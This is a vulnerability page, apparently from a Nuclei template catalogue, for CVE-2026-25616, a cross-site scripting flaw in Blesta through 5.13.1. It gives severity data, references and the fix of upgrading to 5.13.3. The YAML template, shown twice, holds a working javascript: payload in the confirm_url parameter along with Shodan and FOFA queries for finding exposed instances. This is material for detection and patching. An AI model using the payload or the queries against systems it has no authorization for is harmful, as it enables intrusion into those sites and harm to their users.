Blesta <= 5.13.1 - Cross-Site Scripting

CVE-2026-25616

Verified

Description

Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.

Severity

Medium

CVSS Score

6.1

Exploit Probability

Published Date

April 8, 2026

Template Author

0x_akoko

CVE-2026-25616.yaml

id: CVE-2026-25616

info:
  name: Blesta <= 5.13.1 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
   Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
  impact: |
   Attackers can exploit input validation flaws to cause unexpected behavior or security issues.
  remediation: |
   Upgrade to version 5.13.3 or later.
  reference:
    - https://karmainsecurity.com/KIS-2026-01
    - https://www.blesta.com/2026/01/28/security-advisory/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25616
  classification:
    cve-id: CVE-2026-25616
    epss-score: 0.0246
    epss-percentile: 0.85424
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.title:"Blesta"
    fofa-query: app="Blesta"
  tags: cve,cve2026,blesta,xss

http:
  - raw:
      - |
        GET /client_dialog/confirm/?confirm_url=javascript:alert(document.domain) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="javascript:alert(document.domain)"'
          - '<form method="post"'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402203576638fa18efab2ade52c285d91ad6653406ed821d9c013b1864be77b3af562022009df6f972864e63b41afcef6dd21a85bc8039d68527f3d6c0ddd21888fa2cdca:922c64590222798bb761d5b6d8e72950

6.1Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

CVE ID:

cve-2026-25616

CWE ID:

cwe-79

References

https://karmainsecurity.com/KIS-2026-01 https://www.blesta.com/2026/01/28/security-advisory/https://nvd.nist.gov/vuln/detail/CVE-2026-25616

Remediation Steps

Upgrade to version 5.13.3 or later.

id: CVE-2026-25616

info:
  name: Blesta <= 5.13.1 - Cross-Site Scripting
  author: 0x_Akoko
  severity: medium
  description: |
   Blesta 3.x through 5.x before 5.13.3 contains an input validation vulnerability caused by mishandling input, letting attackers potentially exploit the system, exploit requires unspecified conditions.
  impact: |
   Attackers can exploit input validation flaws to cause unexpected behavior or security issues.
  remediation: |
   Upgrade to version 5.13.3 or later.
  reference:
    - https://karmainsecurity.com/KIS-2026-01
    - https://www.blesta.com/2026/01/28/security-advisory/
    - https://nvd.nist.gov/vuln/detail/CVE-2026-25616
  classification:
    cve-id: CVE-2026-25616
    epss-score: 0.0246
    epss-percentile: 0.85424
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-79
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.title:"Blesta"
    fofa-query: app="Blesta"
  tags: cve,cve2026,blesta,xss

http:
  - raw:
      - |
        GET /client_dialog/confirm/?confirm_url=javascript:alert(document.domain) HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'action="javascript:alert(document.domain)"'
          - '<form method="post"'
        condition: and

      - type: word
        part: content_type
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a0046304402203576638fa18efab2ade52c285d91ad6653406ed821d9c013b1864be77b3af562022009df6f972864e63b41afcef6dd21a85bc8039d68527f3d6c0ddd21888fa2cdca:922c64590222798bb761d5b6d8e72950

Blesta <= 5.13.1 - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Blesta <= 5.13.1 - Cross-Site Scripting

Description

Severity

CVSS Score

Exploit Probability

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps